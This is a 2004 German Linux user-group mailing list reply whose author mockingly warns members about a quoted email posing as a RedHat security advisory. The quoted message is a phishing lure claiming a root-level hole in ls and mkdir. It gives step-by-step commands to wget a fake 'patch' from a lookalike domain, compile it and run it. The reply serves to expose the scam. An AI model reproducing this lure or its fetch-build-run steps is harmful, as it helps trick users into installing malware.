[linux-muc] Re: RedHat: Buffer Overflow in "ls" and "mkdir"

  • From: Peter Wintrich <peter.wintrich@xxxxxx>
  • To: linux-muc@xxxxxxxxxxxxx
  • Date: Mon, 25 Oct 2004 12:24:00 +0200

Hehe - Süß ;) 

http://www.heise.de/newsticker/meldung/52480

Also Finger davon liebe Rothüte ;) 

Gruß Peter


Am Mo, den 25.10.2004 schrieb RedHat Security Team um 0:19:
> 
> 
> Original issue date: October 20, 2004
> Last revised: October 20, 2004
> Source: RedHat 
> 
> A complete revision history is at the end of this file. 
> 
> Dear RedHat user,
> 
> Redhat found a vulnerability in fileutils (ls and mkdir), that could
> allow a remote attacker to execute arbitrary code with root
> privileges. Some of the affected linux distributions include RedHat
> 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
> and not only. It is known that *BSD and Solaris platforms are NOT
> affected.
> 
> The RedHat Security Team strongly advises you to immediately apply the
> fileutils-1.0.6 patch. This is a critical-critical update that you
> must make by following these steps:
> 
>       * First download the patch from the Security RedHat mirror: wget
>         www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
>       * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
>       * cd fileutils-1.0.6.patch
>       * make
>       * ./inst
> 
> 
> Again, please apply this patch as soon as possible or you risk your
> system and others` to be compromised.
> 
> Thank you for your prompt attention to this serious matter,
> 
> RedHat Security Team.
> 
> Copyright © 2004 Red Hat, Inc. All rights reserved. 
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ 
> Info (Main-Site): http://wwww.linux-muc.de/ ~~ Un/Subscribe: 
> http://www.freelists.org/cgi-bin/list?list_id=linux-muc ~~ Archives 
> http://www.freelists.org/archives/linux-muc/ 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~ Info (Main-Site): http://wwww.linux-muc.de/
~~ Un/Subscribe: http://www.freelists.org/cgi-bin/list?list_id=linux-muc
~~ Archives http://www.freelists.org/archives/linux-muc/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Other related posts: